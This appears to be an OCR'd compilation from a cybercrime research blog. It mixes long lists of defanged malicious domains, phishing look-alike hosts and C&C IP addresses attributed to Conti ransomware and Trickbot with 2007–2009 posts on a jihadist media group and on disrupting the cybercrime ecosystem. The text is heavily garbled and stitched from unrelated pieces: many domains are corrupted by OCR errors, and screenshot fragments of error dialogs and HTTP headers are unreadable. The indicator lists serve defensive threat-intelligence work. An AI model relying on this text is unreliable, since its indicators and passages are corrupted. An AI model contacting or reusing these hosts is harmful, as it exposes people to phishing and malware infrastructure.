aramaribo[.]Jecolinkshop[.]ru 
araschino[.]eco-link-shop[. ]ru 
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araschino[.]ecolink24[.]ru 
araschino[.]Jecolinkshop[.]ru 
aratheodo[.]Jeco-link-shop[.]ru 
aratheodo[.]ecolink24[.]ru 
arbondal[.]eco-link-shop[.]ru 
arbonda[.]Jecolink24[.]ru 
ardiganshi[.]Jeco-link-shop[.]ru 
ardiganshi[.Jecolink24[.]ru 
aressala[.]eco-link-shop[.]ru 
aressala[.]ecolink24[.]ru 
argasia[.]ecolink24[.]ru 
arginatal[.]eco-link-shop[.]ru 
arginata[.]Jecolink24[.]ru 
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Welcome 
to 
the Global Islamic Media Front’ s 
website 


In one of those "better late than never" type of situations, last month members of the [1]Global 
Islamic Media Front were [2]busted in Germany. The group is largely known due to their re- 
leases and propaganda of the [3]Technical Mujahid E-zine ([4]Part Two) and the [5]Mujahideen 
Secrets encryption tool ([6]Second Version). GIMF was distributing its multimedia through 
popular Web 2.0 video sharing sites, perfectly fitting into the profile of the majority of cyber 
jihadist groups. 


GIMF used to be one of my favorite sources of raw OSINT regarding various cyber ji- 
hadist activities due to its centralized nature and lack of any operational security in place, in 
particular the ways it was unknowingly exposing their social networks online. 


Related posts: 

[7]GIMF Switching Blogs 

[8]GIMF Now Permanently Shut Down 

[9]GIMF - "We Will Remain" 

[10]Inshallahshaheed - Come Out, Come Out Wherever You Are 
[11]A List of Terrorists’ Blogs 

[12]Cyber Jihadist Blogs Switching Locations Again 
[13]Wisdom of the Anti Cyber Jihadist Crowd 

[14]Analyses of Cyber Jihadist Forums and Blogs 

[15]Terror on the Internet - Conflict of Interest 


1. http://www.dw-world.de/dw/article/0, 2144, 3821556, 00. htm 
2. http: //mypet jawa.mu.nu/archives/195137.php 


3. http://ddanchev. blogspot .com/2006/12/analysis-of-technical-mujahid-issue-one.htm 


4. http://ddanchev. blogspot .com/2007/06/analysis-of-technical-mujahid-issue-two.htm 


5. 
6. 
8. 
9. 


ttp://ddanchev.blogspot.com/2007/08/gimf-now-permanently-shut-down.htm 
http: //ddanchev.blogspot.com/2007/08/gimf-we-will-remain.htm 
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ragrosti[.Jecolinkshop[. ]ru 
rahmapootra[.]Jecolink24[.]ru 
rameria[.Jecolink24[.]ru 
rancolil.Jecolink24[.]ru 
rasilia[.Jecolink24[.]ru 
ratislava[.Jecolink24[.]ru 
ravettia[.Jecolink24[.]Jru 
rocroyalbanque[. ]Jinfo 
reality-nachodsko[.]cz 
reenblal[.Jecolink24[.]ru 
refacp003[.]Jcom 
relaxed-dijkstra[.]5-181-156-166[.]plesk[.]page 
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remote[.]baldeaglesecurity[.]com 
repul1902391[.]Jddns[.]net 
rileypatrickhenderson[.]com 
ritannia[.]eco-link-shopf[. ]ru 
rix[.]2vpn[.]net 
rlalonarwa[. ]xyz 
riz[.]quelle[. ]life 
rmageddo[.]eco-link-shop[. Jru 
roi[. }webshoping[.]cloudns[.]cx 
romwellia[.Jecolinkshopf[. ]ru 
roupudh[.]xyz 

rouroudh[.]xyz 
rthoflo[.]eco-link-shop[.]ru 
rthoflo[.Jecolink24[.]ru 
rthoflo[.Jecolinkshop[.]ru 
rthuria[.]eco-link-shop[. ]ru 
rthuria[.Jecolink24[.]ru 
ruchida[.]Jeco-link-shop[.]ru 
rugerra[.]eco-link-shop[.]ru 
rugerra[.Jecolink24[.]ru 
runachal[.]ecolinkshop[. ]ru 
rushmore[.]webshoping[.]cloudns[.]cx 
ryobotrya[.Jecolink24[.]ru 
ryobotrya[.Jecolinkshop[.]ru 
52702407[.]jnd[.]wghjo[.]Jcn 
s3crt[.]biz 

s[.]youtube[.]com 

salem80[. info 
scensiontil[.]ecolink24[.]ru 
scheulea[.]ecolink24[.]ru 
scs[.]zend[.]4pu[.]com 
search[.]apps[.]ubuntu[.]com 
secure-conf[.]com 
selffarma[.]biz 
selffarma[.Jcom 
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selffarmal. info 
selfpharma[.]Jcom 
service[.]dintmedisit[.]me 
sexhunt[.]net 
signin[.]ebay[.]co[.]uk-app[.]pro 
signin[.]ebey[.]co[.]uk-app[.]pro 
signin[.]ebey[.]co[.]uk-msg[.]pro 
signin[.]ebey[.]co[.]uk-wss[.]pro 
sinewavecompany[.]com 
skp-clan[.]ru 
slamaba[.]eco-link-shop[.]ru 
slamaba[.]Jecolink24[.]ru 
smtp[.]cpven[.]Jcom 
sozomanga[.]gq 
stablishmentaria[.]ecolinkshop[.]ru 
stdar[.]ru 
streaming[.]as88[.]live 
sun-consulting[.]com 

super[. ]topfangx[.]Jcom 
supercvv[.]cc 


supershopping[.]publicvm[.]Jcom 


supervision[. ]professionalism[.]dontexist[.]com 


sygerard[. ]direct[. ]quickconnect[. ]to 
t-ohio-gov[.]us 
t7djaul[.]findhere[.lorg 
teahgiaj3ig[.]cn 
templates[.]ball-layouts[.]com 
test[.]byOts[.]net 
test[.]Jenergyglobalinvestments[.]com 
the-bloodbalance[.]net 
thebestconference[.]online 
thefridge25[.]direct[.]quickconnect[.]to 
therinida[.]eco-link-shop[.]ru 
therinida[.]ecolinkshop[.]ru 


thetribune[.]live 
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threat[.]professionalism[.]dontexist[.]Jcom 
tikkie-pay[.]com 
tmt[.]380112[.]xyz 
twilighttech[.]net 

txvia[.]com 
u11[.]protonvideo[.]to 
uceratosa[.]Jecolink24[.]ru 
uchenwa[.]ecolink24[.]ru 
ucioperca[.Jecolink24[.]ru 
ucullea[.Jecolink24[.]ru 
ucurbitacea[.]eco-link-shop[.]ru 
udermannia[.]eco-link-shop[.]ru 
udermannia[.]ecolink24[.]ru 
udo[.]auctions2000[.]cloudns[. ]cx 
uggenheil[.]eco-link-shop[.]ru 
uilielma[.Jecolink24[.]ru 
ujiyamal[.]eco-link-shopf[. ]ru 
ujiyamal[.]Jecolink24[.]ru 
ukasiewi[.Jecolink24[.]ru 
ulbertso[.]ecolink24[.]ru 
uligula[.]eco-link-shop[. ]ru 
ullinga[.]Jeco-link-shop[. ]ru 
underso[.]eco-link-shop[.]ru 
undierungaxio[.]eco-link-shop[.]ru 
undierungaxio[.]Jecolink24[.]ru 
unfermli[. ]ecolink24[.]ru 
untingdo[.]eco-link-shop[.]ru 
untingto[.]eco-link-shop[.]ru 
untingto[.Jecolink24[.Jru 
unyakovskii[.]eco-link-shop[. ]ru 
upatori[.]eco-link-shop[.]ru 
upgittas[.]Jcom 
uplin[.]k-in-gov[. ]life 
uplin[.]k-in-gov[.]site 
uplin[.]k-in-gov[.]work 
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urafrica[.]eco-link-shop[. Jru 
uramerica[.]eco-link-shop[. ]ru 
uramerica[.]ecolink24[.]ru 
uramerica[.]ecolinkshop[.]ru 
urbanconnectionsrealty[.]com 
urculionidal[.]eco-link-shop[.]ru 
urdista[.]eco-link-shop[. ]ru 
urgautia[.]eco-link-shop[. ]Jru 
urgautia[.]ecolink24[.Jru 
urgautia[.]ecolinkshop[.]ru 
urgundia[.]eco-link-shop[. Jru 
urignacia[.]eco-link-shop[.]ru 
urignacia[.]ecolink24[.]ru 
urlingto[.]eco-link-shop[.]ru 
urodolla[.Jecolinkshop[. ]Jru 
uropeani[.]Jeco-link-shop[. ]ru 
urschma[.]eco-link-shop[.]ru 
urschma[.]Jecolink24[.]ru 
uschelka[.]ecolink24[.]ru 
uscicapida[.]eco-link-shop[.]ru 
uscinia[.]ecolinkshop[. ]ru 
usseldo[.]eco-link-shop[. ]ru 
usseldo[.]ecolink24[.]ru 
ustachial[.]Jecolink24[.]ru 
ustachia[.]ecolinkshop[.]ru 
ustelinal[.Jecolink24[.]ru 
ustraloi[.Jeco-link-shop[.]ru 
ustraloi[.Jecolinkshop[.]ru 
ustralopitheci[.]eco-link-shop[.]ru 
ustronesia[.Jecolink24[.]ru 
utterwo[.]Jecolinkshop[. ]ru 
uvenalia[.]eco-link-shop[. ]ru 
uvenalia[.Jecolink24[.]ru 
v11[.]phephim[.]xyz 
vayu[.]tv 
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verlengen-woningnet[.]Jonline 
vibrant-mendeleev[.]162-33-178-178[.]plesk[.]page 
vqv[.]priceline[.]Jcloudns[.]cx 

vqz[.]quelle[. llife 

wb5nfc[.]net 

wcf[.Jauctions2000[.]cloudns[.]cx 

wdkul[.]fun 

wensboro[.]eco-link-shop[.]ru 

wensboro[.]ecolinkshop[. ]ru 

wil[.]jaredyounger[.]Jcom 

windowsupdatepacks[.]win 

wishes[. ]professionalism[.]dontexist[.]Jcom 
wtl[.Jauctions2000[.]cloudns[.]cx 

wwc[.]quelle[. ]life 

www2-ill[.]inois-gov[.]live 
www![.]180[.]01d176b24[.]148bd4fal[.]micro1[.]Jinbox[.]| and 
www[.]195-123-214-177[.]cprapid[.Jcom 
www![.]1a7174994[.]31d176b24[.]148bd4fal.]micro1[.Jinbox[ .Jland 


www[.]2171e7e11f6227c96177ab00de410e19eabeedb85[.]3bcd8e8cc0e2d839d 
7678beafcOaefld4ea80e3al[.J21d176b24[.]148bd4fal[.]microl[ .Jinbox{[.Jland 
www[.]2vpn[.]net 


wwwl(.]31e6228a24142f72af3ea756b8429ed0a0d5afcf80e7da65cedfaacfd[.]4 
bc545408ad156cdaf827b11014532fc6db3a260d4cfb1c6c68e594c[.]c93aa4fbd - 
3Bafdd6dd7ab4d8d0644403fb702bbc719ed41aa915e679al.J11d176b24[.]148bd 
Afa[.Jmicrol[.Jinbox[.]land 


www[.]34f82abf6cd54a312d2f28dfe63390ae226e32a26e45a9aec4211df17[.]71b 2- 
050b3a1298362aal1d2da94baec9e044ac9e1d12486cbf056a68[.]b9f1c2d7e9b1fea 
3825a1fb494737dc66d0bb0d663bfca4589783b1d[.]169765168[.]6317ddb2[ 
.]Jns5[.]microsoft-support[.]net 


www[.]36e1437b0206fd493c047de513cd4fc666784c580908c3c7ccb23b60c[.]b8 - 
c352ce7e04b1b5c01ee0a9348732c4ea76735ed9b651cd4dac7fbf[.]7922838d5ca5ff 
9752cObdea926bbcOff84ae0ba2fc5aad5ef9ff6a7[.]1351905d1[.]11981[. |static[. ]realtek- 
analytics[.]com 


www[.laasfhhvyyayssa[.]xyz 
wwwl[.Jadmin[.]nticket[.]md 
www/l[.lajustes[. ]digital 
www[.Jagacidom[.]com 
wwwl[.Jasfuuvhv3083f[. ]xyz 
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wwwl.lasgyyya6ychcha[.]xyz 
wwwl[.]Jasoexample[.]site 
wwwl[.]ate-co-us[.]store 
www[.]baramanamc[.]com 
wwwl[.]bartholaraka[.Jcom 
wwwl[.]bestcom[.]be 

www. ]biekekyw[.]com 

www. ]bitavey[.Jcom 
wwwl.]brand339[.]Jcom 
wwwl[.]browseroperagx[.]com 
wwwl[.]byOts[.]net 
wwwl.]candabare[.]com 
www. ]catransfer39933[.]live 
wwwI[.]chanta[.Jcam 
www[.]d24[.]ru 
wwwI[.]dns-reverse[.]net 
www/[.]dol[.]stat[.]Je-ga-us[.]me 
wwwl.]domosedoff[. ]Jru 
wwwI[.]e-co-us[.]work 
www[.]e-ga-us[.]me 
wwwl[.leartymanacaty[.]com 
wwwl[.]ethnorepublic[.Jcom 
wwwl[.]fuuhwyyw[.}Jcom 
wwwl.]gapingbutt[.]com 
wwwl[.]guyjsu[.]club 
wwwl[.]gx-opera[.]com 
www[.]gxopera[.]com 
www[.]ha-cker[.]xn-ses554g 
wwwl[.]harleywebshop[.]com 
wwwl.]htscript[.]Jenergyglobalinvestments[.]com 
www .libanverificatie-marktplaats[.]one 
wwwl.]lideal-ing[.Jonline 

www .]ling-betaalpagina[.]n| 
wwwl.]inois-gov[.]live 


www. Jiticket[.]events 
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wwwl.liticket[.]md 

www [.]k-in-gov[. ]life 

www [.]k-in-gov[.]site 

www/I[.]k-in-gov[.]work 
wwwl[.]kaarinam[.]Jonline 
wwwl.]karanabaz[.]Jcom 
wwwl!.]kloi-areal.Jcom 

wwwl.]|koltygo[.]Jcom 

www[.]livechat[. ]energyglobalinvestments[.]com 
wwwl.]lumus[.]ru 

www[.]megapesni[.]net 

www [.]metamask-io[.]lourdesviajes[.]com 
wwwl[.]metamask[.]miacuinal[.]Jcom 

www [.]micrOsoft-online[.]com 
wwwl[.]modest-jackson[.]5-181-156-166[.]plesk[.]page 
www[.]nextgenjquery[.]xyz 
wwwl.]|nticket[.]md 
www[.]operagxbrowser[.]com 
www[.]otscript[.]energyglobalinvestments[.]com 
www [.]portymara[.]Jcom 

www [.]psdgiigjsjavy3[.]xyz 
www[.]selfpharma[.]Jcom 
wwwl[.]sexhunt[.]net 

www[.]supercvv[.]cc 

www/I[.]t-ohio-gov[.]us 

www. ]teahgiaj3ig[.]cn 

www [.]test[.]energyglobalinvestments[.]com 
wwwl.]the-bloodbalance[.]net 
www[.]verlengen-woningnet[.]Jonline 

www [.]y-gov[.]work 

www[.]zafie[.]ru 
www[.]zendezksupportsystem[.]com 
xfordshi[.]ecolinkshop[.]ru 
xI[.]css[.]derp-cdn[.]Jcom 
xpressa[.Jecolink24[.]ru 
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xpressa[.]Jecolinkshop[.]ru 
xsp[.]css[.]derp-cdn[.]com 
xvmfargoselect[.]Jcom 
y-gov[.]work 
yderabal[.]eco-link-shop[.]ru 
ydrocharil.Jeco-link-shop[.]ru 
ydrocharil[.Jecolinkshop[. ]ru 
ydrocho[.]Jecolinkshop[.]ru 
ydrogeologi[.]eco-link-shop[.]ru 
ydrogeologil[.Jecolinkshop[.]ru 
ydroseil.]eco-link-shop[. ]ru 
yelorussia[.]ecolinkshop[.]ru 
yk-in-f113[.]1le100[.]net 
ylocichla[.]eco-link-shop[.]ru 
ylocichla[.Jecolinkshop[.]ru 
yls[.Jauctions2000[.]cloudns[.]cx 
ynoscio[.]ecolinkshop[.]ru 
youbestho[.]m| 
yprinida[.Jeco-link-shop[.]ru 
ysodonta[.]ecolinkshop[.]ru 
ystoideal[.]eco-link-shop[.]ru 
ystoidea[.]Jecolink24[.]ru 
ystoidea[.]ecolinkshop[.]ru 
zhangxiaobin8848[. ]xyz 
ziggo1234[.]synology[.]me 
zoom203212[.]ddns[.]net 
zuk[.]deadlines[.]4pu[.]com 
zukirisakaze[. ]platf[.]4pu[.]Jcom 


Related responding domains known to have participated in Conti ransomware gang’s C &C 
(Command and Control) and Internet connected infrastructure include: 


11985-22223[.]bacloud[.]info 
14740-25788[.]bacloud[.]info 
15161-26416[.]bacloud[.]info 
15877-27627[.]bacloud[.]info 
162[.]244[.]81[.]252[.]81[.]244[.]162[.Jin-addr[ .Jarpa 
173-19-92-26[.]client[.]mchsi[.]Jcom 
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198-46-198-128-host[.]colocrossing[.]com 
198-46-198-9-host[.]colocrossing[.]com 
19[.]0-63[.]191[.]36[.]194[.Jin-addr[.Jarpa 
285[.]bhs[.Jabcvg[.Jovh 
43[.]126[.]75[.]91[.]stargatecommunications[.]c om 
45[.]32[.]132[.]182[.]vultr[.]Jcom 
5-181-156-166[.]mivocloud[.]Jcom 
65-119-186-242[.]dia[.]static[.]qwest[.]net 
75-163-169-121[.]clsp[.]qwest[.]net 
79-112-76-251[.]iasi[.]fiberlink[.]ro 
96-93-217-253-static[.]hfc[.]comcastbusiness[.]net 
9879-17568[.]bacloud[.]info 

andgetroid[.]co[.]uk 

api[.]snapcraft[.]io 
bras-base-ahbgon0101w-grc-24-184-146-91-74[.]dsl[.]bell[.Jca 
c-68-61-238-2[.]hsd1[.]mil.]comcast[.]net 
c-73-128-248-22[.]hsd1[.]md[.]Jcomcast[.]net 
c-73-31-89-221[.]hsd1[.]wv[.]comcast[.]net 
cpe-174-96-143-3[.]columbus[.]res[.]rr[.Jcom 
cpe-67-243-142-225[.]nyc[.]res[.Jrr[.Jcom 
dns-reverse[.]net 
ec2-3-11-85-34[.]eu-west-2[.]compute[.]Jamazonaws[.]com 
einstein[.]census[.]shodan[.]io 

enigma-hq[.]net 

free[.]ds[.]melbicom[.]net 
g6wz1wll[.]lifeinsuranceux[.]com 
gw1[.Jmad1[.]vitalng[.]Jcom 

hathil[.Jco[.]in 

hml04[.]pabsticalch[.]info 

home[.]boomshow][. ]live 
hwsrv-935246[.]hostwindsdns[.]Jcom 
hwsrv-935575[.]hostwindsdns[.]Jcom 
ip29[.]Jip-51-38-95[.Jeu 

ip4[.]ip-198-244-194[.]eu 
jh153[.]perfectdeals[.]xyz 
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5.1 January 


5.1.1 Squeezing the Cybercrime Ecosystem in 2009 (2009-01-06 15:31) 


manne NN 


SANA 
PANN 
CW 


How do you trigger a change that would ultimately affect the entire cybercrime ecosystem? 
Going full disclosure may be the most logical option, but past experience reveals that using it 
has a modest temporary effect. For instance, exposing a stolen credit cards shop isn’t going 
to separate the owner from the stolen database, neither would his customers base disappear, 
so stating that it’s shut down in reality means that it’s currently active at another location 
which the owner quickly communicates to the customers base. | keep seeing it happen once 
a sample service gets media attention, and I'll keep seeing it happen. 


The myth that geolocating their malicious activities would always end up in an Eastern 
European network where developed law enforcement agencies would have little to no 
jurisdiction at all, proved to be a [1]common stereotype given [2]that the well known 
[3]cybercrime-friendly ISPs that were shut down in 2008 were and have always been U.S 


2063 


mail[.]armalavage[.]com 
maill.Jextrasenses[.]ru 
mail[.]keystonecollections[.]com 
mail[.]stonesriverelectric[.]com 
mail[.]zeakids[.]de 
male-disk[.]picotor[.]net 
nc-ph-3259[.]web-hosting[.]com 
no-mans-land[.]m247[.]com 
no-rdns[.]mivocloud[.Jcom 
ns3206394[.]ip-37-187-24[.]eu 
nxmrwayhk[.]com 
ool-18b93d63[.]dyn[.]optonline[.]net 
p57a63989[.]dipO[.]t-ipconnect[.Jde 
p57a6398e[. ]dipO[.]t-ipconnect[.]de 
pool-71-168-131-157[.]cmdnnj[.]fios[.]verizon[.]net 
remote[.]baldeaglesecurity[.]Jcom 
rix[.]2vpn[.]net 
rns[.]nz[.]zappiehost[.]Jcom 
rotfl[.]co[.]uk 
rrcs-192-154-176-134[.]sw[.]biz[.Jrr[.Jcom 
rrcs-97-77-191-226[.]sw[.]biz[.Jrr[.Jcom 
5445689[.]srvape[.]Jcom 
sau-6bc8f-or[.]servercontrol[.]com[.]Jau 
scraggy4[.]co[.]uk 
server10180[.]megahoster[.]net 
smtp1120[.]crewaqual[.]net 


smtp[.]cpven[.]Jcom 


static[.]162[.]32[.]55[.]162[.]clients[.]yo ur-server[.]de 


storage-669286[. ]hosted-by[.]itldc[.]com 
stylesgrab[.]Jcom 
uk-in-f113[.]le100[.]net 
vds-695906[.]hosted-by-itldc[.]com 
vds-853358[.]hosted-by-itldc[.]com 
vds-890093[.]hosted-by-itldc[.]com 
vps[.]hostry[.]com 
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yk-in-f113[.]1le100[.]net 


Related malicious URIs known to have participated in Conti ransomware gang’s C &C (Com- 
mand and Control) and Internet connected infrastructure include: 


hxxp://5[.]2[.]78[.]37/armed15/kazan073 
Stay tuned! 
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SMRse4KnQHPuP-NcX_Vu6hVhxJa_EysaPj2Lj6boZbeSxW1Xy2_di 
https: //blogger . googleusercontent.com/img/a/AVvXsEis2QNk1Hx5QidhW4eCpfGFU_wOpHWbIm1N8wkk18m8PpJyidS7uaV7H 
kkw-__80fqA-qN8Rz1izc4jIFO1-ZonS6sliTw1LS7sSk09gisrPd 
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BfP8m_1WETeit4nWZvR9G60ZP2tgkTSRuMELruY_YEx8xYpKSq-9-A 


4. https://blogger . googleusercontent .com/img/a/AVvXsEgTWp-Lr_yu216E4toY8yq2 jFJ--2eEZhTx1xbgMcFWQ1hImZN65jNUI1P 
5. nvtps:/ ulogger .g00gleusercontont.con/ing/a/ iVVeE.viCsFO6usB0ReSa ZT, 6- tay v2BH JeonddzagOht2aOTFFiT 
6. nctps:/ulogger .g00gleusercontent.con/ing/a/ Vet gOFaf40K@FRadaOb7OS0U0Bcotjt-TWERSSWDATOONVpGkgbaBcd 
i-7tIwVAeGCB6ppmik3g_-8ShWRqWRcH7-vQa9v jmId8TmcQ5Vmm6t 

7. https: //blogger . googleusercontent .com/img/a/AVvXsEi0kzAkAxUWPSpF13rDwHKym_IppHbHHPaMzYuzbh9sAISOi_-ZYOnsh 

8. https://blogger . googleusercontent . com/img/a/AVvXsEif 2HUtC91RkCkSze8-V4L01dj AZeZDxCfxR2nhPqVT5ZUBZ3ra3R7VV 

9. https://blogger . googleusercontent .com/img/a/AVvXsEgQhh_jNdkf52q5f-soTULRchHzxJYb2Nph5oL_xuXdktMKwa4zxSP5f 


HhvDovzdVmJOcOREWM6LSCIgROW_Np43qy JpNA8_gQ9iGGhg-onL 
0. https://blogger.googleusercontent.com/img/a/AVvXsEibYFBvr3k9eIEQQqu00aJEj eREX1Ny4riRPFPPiVWpYHN7 j 3M4p1kQ 
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11. https://blogger.googleusercontent.com/img/a/AVvXsEgpLtvSeEotkCUU1LId70E9_OkEilAuH2gL9J95iRC7To- ZmWEd6PCZ 
rwaEXxXhXmx4I1Ikmr-TF6LORA0yxzo51WpNog4t 5UkIhU7hbZTXD5dGe 
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based operations. Therefore, the excuse of not being able to take action due to the lack of 
international law enforcement cooperation isn’t appicable in this case. 


So how should the cybercrime ecosystem be squeezed? Personalize it and communi- 
cate the levels of efficiency cybercriminals achieve by using the very same disturbing photos 
that they use to demonstrate the effectiveness of their web based stolen credit card shops in 
order to achieve the necessary public outbreak. 


Even though | pretend that the research and profiles of the underground tools and ser- 
vices that I’ve been detailing throughout 2008 is cutting-edge research, this research is 
basically scratching the surface, but how come? Just like there’s a perfect and bad timing for 
a particular product or service to hit the market, in this very same fashion the general public 
is still not ready to embrace some of the highly disturbing point’n’click identity theft services 
that have been operating for years. Sadly, some even question the usability and authenticity 
of these underground services, and therefore a change has to be triggered by starting to 
publish the cybercriminals’ ROI out of using them in the form of the photos of users swimming 
in cash that they’ve cashed-out of the stolen credit cards. Disturbing? It’s supposed to be, 
since it will not only prompt public outbreak, but also, have a well proven self-regulation effect 
on behalf of the service owner's, at least from my personal experience while profiling related 
services. 


This is perhaps the perfect moment to emphasize on how important threat intell sharing 
with law enforcement, whether directly based on personal contacts or through one-to-many 
communication model through private mailing lists, a cyber threats analysts case-building 
capabilities would not only prove valuable in the long term, but would also make it easier for 
someone to do their prosecuting job faster. And while important, threat intell sharing with 
law enforcement is not the panacea of squeezing the cybecrime ecosystem, since cybercrime 
should not be treated as the systematic abuse of common IT insecurities for fraudulent 
purposes, instead, it should be treated as a form of economic terrorism. Only then, would 
cybercrime receive the necessary attention instead of [4]such comments regarding McColo 
or Atrivo - "Resource-wise, we can’t be in the business of prevention. We have to be in the 
business of prosecution." Exactly. | guess that just like you cannot be a prophet in your own 
country, you cannot also be a prophet in your own agency, thankfully, the wisdom of the 
cybercrime fighting crowd is always there to take care and get zero credit at the end of the 
day. 
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Internal Server Error 
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404 


Sorry but we couldn't find this page 
Thies page you are looking for does not exist Report tis? 


[37] 


[38] 


[39] 


Cache-Comrol no-cxhe, pevule 
Connection Keep-Alive 
Content-Length 2? 
Content Type appication/json 
Date Mon, 29 Jen 2020 13:55:53 GMT 
Keep-Alive tmecut=5. mass 100 
Server Apache/2A.2 (Wiré4) PriP/? 3.13 OpenSS/1.0. te 
X-Powered-By PHP/T.S.13 
XM. Rateliont. Limit 60 
X-Ratelimit-Remaining 59 


Accept test/imLapphation/shtm!+emLappicationfmtg=0.9.°/9<0.8 
Accept-Encoding gn. Getate br 
Acceptlangeage en-USerng9O5 
Connection keep aive 
Host aSggPcikiyg3ttacnen 
Upgrede-insecure-Requests 1 
User-Agent Mozilla/S.0 (Windows NT 10.0; e680) Gecko/20100101 Fireten/$3.0 


[40] 


Cache-Controt no-cache, private 
Connection Keep-Alve 
Content-Lengts 2 
Content Type appicationyjson 
Date Mon, 29 bun 2020 1355453 GMT 
Keep-Alive timecut<S, max= 100 
Server Apache/242 (Win64) PHP/? 3.13 OpenSSL’ 
X-Powered-By PHP/T.S.13 
X-Ratelimit-Limit 60 
X-RatelimitRemawing 59 


Ole 


Request Headers 


Accept testfhimlapsiication/shtim! +smlLappication/amiee 0.9."/% 970.8 
Accept-Encoding np. cleflvie, or 
Accept-Language en USemg-05 
Connection keep ative 
Host adggjhakdiglébecnen 
Upgrade-Insecure-Request: 1 
User-Agent Monla/5.0 (Windows NT 10% rv68.0) Geckoy20100 101 Firetoni.0 
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Response Headers 


Cache 


Connection 
Content. Leagt 
Content-type 
Date 
Keoop-Alive 


Server 


oe Limit 
X-Ratelimit- Remaining he. 


Request Headers 


Accept ’ op 


Accept incoding 


Accept Lanquage 
Cache-Controt 
Connection & 
Most 
Upgrade-imecure-Requests 
User Agent fh s 
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There was ® problem starting 
CADET une ippOuta Rosin Whe? ofderl SFMT Tanerivet 
“ 


Opeishon Gd rot complete sutcertuby Decale he Me 
tortains a ntun ot potentially unwanted 1o*ware. 


Ca 
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There was 2 peoblem starting 
Cer asenDownioads (402 ah 


The ipectied module could rot be found. 


x 


[47] 


& Duplicate Finder - x 


Search for duplicate fies in the folowing directory 


[¥ Search in subfolders o:0 
‘Start Stop Peuse | 
Seortin order of Sortin order of azes 


[48] 


Personally, 2009 is going to be the year when personalizing cybercriminals would be taking 
place on a more regular basis, so stay tuned for an upcoming report summarizing "behind the 
curtains" cybercrime activities in 2008, underground responses to some of major busts of year 
including the DarkMarket operation, the fraudulent schemes allowing them to cash-out digital 
assets into hard cash, the basics of their social networking model, who’s who in the hierarchy 
of a sampled business model of vendors of ATM skimming devices, the post-DarkMarket 
OPSEC practices introduced in order for cybecrime communities to verify the authenticity of 
their customers, the process of advertising and operating underground services as well as the 
communication methods used, in short - all the juicy details, screenshots and photos courtesy 
of the owners and customers of the services that haven’t been communicated to the industry 
and the world throughout 2008. 


Find attached a photo teaser acting as a confirmation for the usefulness of "yet another 
stolen credit card details service" in the wild, and have a productive year exposing low lifes 
and spilling coffee over their business models. 


Related posts: 

[5]76Service - Cybercrime as a Service Going Mainstream 
[6]Using Market Forces to Disrupt Botnets 

[7]Localizing Cybercrime - Cultural Diversity on Demand 
[8]Localizing Cybercrime - Cultural Diversity on Demand Part Two 
[9]EstDomains and Intercage VS Cybercrime 

[10]E-crime and Socioeconomic Factors 

[11]Money Mules Syndicate Actively Recruiting Since 2002 
[12]Price Discrimination in the Market for Stolen Credit Cards 
[13]Are Stolen Credit Card Details Getting Cheaper? 

[14]The Underground Economy’s Supply of Goods 


1. 
2. 
3. 
4. 
5. http://ddanchev. blogspot . com/2008/08/76service-cybercrime-as-service- going. htm 
6. 
7. 
8. 


ttp://ddanchev .blogspot.com/2008/06/using-market-forces-to-disrupt-botnets .htm 
ttp://ddanchev. blogspot .com/2008/02/localizing-cybercrime-cultural .htm 
ttp://ddanchev.blogspot.com/2008/11/localizing-cybercrime-cultural .htm 
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ERROR 


Contirmmation code for RingCentral Operator #00020 
ERROR: Update your Adobe Reader or try on another 


- computer 


[49] 
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cmd.exe - Application Error 


x) The application was unable to start correctly (OxcO000005) 


Click OK to close the application. 


Problem signature: 
Problem Event Name 
Application Name 
Application Version: 
Application Timestarnp: 
Fault Module Name 


Fault Module Version: 


Fault Module Tirnestarnp 
Fyrention Offcet 
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BEX 

secinit.exe 
7600.16385 

‘ 16 
StackHash_fa66 
0.000 
00000000 

Onan Aan 


Failed to start logger 


[53] 


OK | 
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Select troubleshooting option 


> Try recommended settings 
Select this option to test run program using recommended compatibility settings 


% Troubleshoot program 
Select this option to cheose compatibility settings based on problems you notke 


[54] 


The program or feature “\??\C:\Users\ TST7x64\ AppData\Local\ Ternp\C8FC. exe” 
cannot start of run due to incompatibity with 64-bit versions of Windows. Please 
contact the software vendor to ask if 2 64-bit Windows compatible version is 
available. 


Ykaxute pasmep yaaneHHoro pabouero ctona. K 
NPaBOE NONOXEHME NONSYHKa COOTBETCTBYET 
NONHOSKPaHHOMy pexumy. 


[55] 1366 Ha 768 nukceneh 


TF Preview Printer 6.052020 1:28 Mpnrceenne 21K5 


~ Ha MpOWAOR Hegene (5) 


 astat-mpe Adobe Acrobat ©. sues 

A astat iInpst Adobe Acrobat 0. 20 Kb 

D cbtees nee Nparceenne 16 942 KE 

OO everttics Devin Calendar 2KB 

& terbrowier-anstal wit 9.54 were Nparceenne SOE KE 
v Panee 0 970m wecaue (4) 

YF Oropboolnntalier exe 04.09.2003 2239 Miparcceerae O55Kh 


[57] 


A Docurreet_Previes exe 


nttpa tine Oo-So-tine § qooginuserrceant comdoes/ sacurenc AtvObagomcuemibe! | 


Thes Mie 6 eck COMWOny Gownbouded and May De dargercus 


Unecers Keep 


[58] 


BecumentAreview.ewe Failed - Virus detected 


Nitpu/greenmountens a¢/Do% 81 ureent_PrS.0OS BSview exe 


[59] 
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Baw Bitcoir wen 

Nonyyaw —> Cymma 
A, Al 1 RUE 

Kowenek 4, Jlexpru 


Sample malicious C &C IPs found in the internal and leaked Trickbot malware gang communi- 
cation: 


162[.]244[.]82[.J215 
165[.]22[.]25[.]174 
195[.]123[.]212[.]155 
173[.]232[.]146[.]236 
195[.]91[.J226[.]161 
185[.]217[.]117[.]127 
5[.]17[.]161[.]235 
173[.]232[.]146[.]199 
173[.]232[.]146[.]72 
51[.]89[.]125[.]28 
51[.]77[.]112[.]254 
185[.]99[.]2[.]191 
134[.]119[.]191[.]22 
194[.]87[.]145[.]86 
185[.]99[.]2[.]221 
5[.]1[.]81[.168 
185[.]164[.]32[.]148 
185[.]14[.]31[.]135 
194[.]5[.]249[.]163 
194[.]5[.]249[.]164 
195[.]123[.]237[.]241 
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195[.]123[.]241[.]68 
95[.]171[.]15[.]71 
195[.]123[.]241[.]175 
82[.]146[.]37[.]128 
85[.]143[.]221[.]85 
45[.]138[.]158[.]41 
164[.]132[.]76[.]76 
194[.]156[.]98[.]46 
93[.]189[.]46[.]41 
81[.]177[.]139[.]38 
54[.]37[.]237[.]253 
195[.]123[.]241[.]194 
51[.]89[.]177[.18 
195[.]123[.]237[.]91 
91[.]235[.]129[.]64 
194[.187[.]232[.]53 
185[.]17[.]123[.]63 
45[.]138[.]158[.]35 
